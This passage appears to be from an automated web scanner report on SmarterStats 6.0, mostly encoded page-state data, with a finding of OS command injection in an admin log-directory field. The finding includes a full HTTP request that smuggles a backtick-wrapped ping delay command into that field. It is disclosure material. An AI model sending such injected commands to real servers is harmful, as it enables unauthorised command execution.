C4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr
%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAKQFNFT1N0YXR1cwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAADFNFT1N0YXR1c1RhYgtkBRZjdGwwMCRNUEgkZ3JkU2VvU3RhdHVzDwU6VHJ1ZXxUcnVlfHxUcnVlfFRydWV8bGFzdFByb2Nlc3NpbmdEYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGQFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW01DzLcCwABAAAA%2F%2F%2F%2F%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%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAALQFNlb09wdGlvbnMB9f%2F%2F%2F%2Fz%2F%2F%2F8GDAAAAAhTZWxlY3RlZAgBAAHz%2F%2F%2F%2F%2FP%2F%2F%2FwYOAAAAClBhZ2VWaWV3SUQGDwAAAA1TZW9PcHRpb25zVGFiC2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW00DzLUCwABAAAA%2F%2F%2F%2F%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%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0t
leVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAHQExvZ0ZUUAH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAACUxvZ0ZUUFRhYgtkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMg8y3AsAAQAAAP%2F%2F%2F%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%2F%2F%2F%2F5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2F%2F%2F%2F%2FP%2F%2F%2FwYHAAAABFRleHQKAfj%2F%2F%2F%2F8%2F%2F%2F%2FBgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BMb2dPcHRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU2VsZWN0ZWQIAQAB8%2F%2F%2F%2F%2Fz%2F%2F%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%2F%2F%2F%2F%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%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBg
oAAAAIQE9wdGlvbnMB9f%2F%2F%2F%2Fz%2F%2F%2F8GDAAAAAhTZWxlY3RlZAgBAAHz%2F%2F%2F%2F%2FP%2F%2F%2FwYOAAAAClBhZ2VWaWV3SUQGDwAAAApPcHRpb25zVGFiC2QFGWN0bDAwJE1QSCRQYWdlSWRlbnRpZmllcjEPBSA2NzA2YjYxZDhmYjg0MDhkYjBiZDdkYWY5OTU2ZTNlY2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW03DzLaCwABAAAA%2F%2F%2F%2F%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%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAKQExvZ1N0YXR1cwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAADExvZ1N0YXR1c1RhYgtkX5dB0MWxfpOHdZB%2BIBMIEdqpxe094wua6ZwWPljnYkU%3D&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:04:04 GMT
Content-Length: 0


1.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtSmarterLogDirectory parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24txtSmarterLogDirectory parameter appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time-delay commands to verify that the vulnerability exists.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the ctl00%24MPH%24txtSmarterLogDirectory parameter. The application timed out when responding to the request, indicating that the injected command caused a time delay.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 30128

ctl00%24MPH%24txtDefaultDocuments_SettingText=%0d%0aindex.htm%0d%0aindex.html%0d%0adefault.asp%0d%0adefault.aspx&__LASTFOCUS=&ctl00%24MPH%24lstServer_SettingDropDown=1&__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24MPH%24txtSmarterLogDirectory=C%3a%5cSmarterLogs`ping%20-c%2020%20127.0.0.1`&ctl00%24MPH%24lstLogFormat_SettingDropDown=IIS&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24grdLogLocationsCheckAll=on&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=1&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=555-555-0199@example.com&ctl00_MPH_grdSeoStatus_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineS
ettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24txtDomainUrl_SettingText=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00%24MPH%24chkStripAfterSemi_SettingCheck=on&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24txtExportLogDirectory=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24lstStatus_SettingDropDown=paused&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=hoytnet&ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-=on&__VIEWSTATE=%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%2f%2f%2f%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%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAACEBPcHRpb25zAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8
GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtkBRljdGwwMCRNUEgkZ3JkTG9nTG9jYXRpb25zDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTgPMtoLAAEAAAD%2f%2f%2f%2f%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%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAApAU0VPU3RhdHVzAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAMU0VPU3RhdHVzVGFiC2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW01DzLcCwABAAAA%2f%2f%2f%2f%2fwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC
4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2f%2f%2f%2fkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2f%2f%2f%2f8%2f%2f%2f%2fBgcAAAAEVGV4dAoB%2bP%2f%2f%2f%2fz%2f%2f%2f8GCQAAAApSZXNvdXJjZUlEBgoAAAALQFNlb09wdGlvbnMB9f%2f%2f%2f%2fz%2f%2f%2f8GDAAAAAhTZWxlY3RlZAgBAAHz%2f%2f%2f%2f%2fP%2f%2f%2fwYOAAAAClBhZ2VWaWV3SUQGDwAAAA1TZW9PcHRpb25zVGFiC2QFFmN0bDAwJE1QSCRncmRTZW9TdGF0dXMPBTpUcnVlfFRydWV8fFRydWV8VHJ1ZXxsYXN0UHJvY2Vzc2luZ0RhdGUgZGVzY3xGYWxzZXxGYWxzZXwwZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTcPMtoLAAEAAAD%2f%2f%2f%2f%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%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAApATG9nU3RhdHVzAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%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%2f%2f%2f%2f%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%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYW
lyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAdATG9nRlRQAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAJTG9nRlRQVGFiC2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0zDzLgCwABAAAA%2f%2f%2f%2f%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%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2f%2f%2f%2fkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2f%2f%2f%2f8%2f%2f%2f%2fBgcAAAAEVGV4dAoB%2bP%2f%2f%2f%2fz%2f%2f%2f8GCQAAAApSZXNvdXJjZUlEBgoAAAANQExvZ0xvY2F0aW9ucwH1%2f%2f%2f%2f%2fP%2f%2f%2fwYMAAAACFNlbGVjdGVkCAEAAfP%2f%2f%2f%2f8%2f%2f%2f%2fBg4AAAAKUGFnZVZpZXdJRAYPAAAAD0xvZ0xvY2F0aW9uc1RhYgtkBRljdGwwMCRNUEgkUGFnZUlkZW50aWZpZXIxDwUgNGZlNTRjNDQyMWIwNGU1YTk3NWFhNjliOWNjY2M4MTBkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMg8y3AsAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN
1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0